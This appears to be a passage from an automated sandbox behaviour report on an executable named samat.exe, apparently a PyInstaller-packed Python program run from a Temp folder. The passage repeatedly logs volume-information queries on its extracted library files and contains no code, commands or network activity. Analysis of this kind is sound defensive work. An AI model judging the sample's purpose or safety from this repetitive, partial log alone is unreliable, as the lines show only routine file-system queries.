Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pyexpat.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\jaraco\text\Lorem ipsum.txt VolumeInformation	Jump to behavior
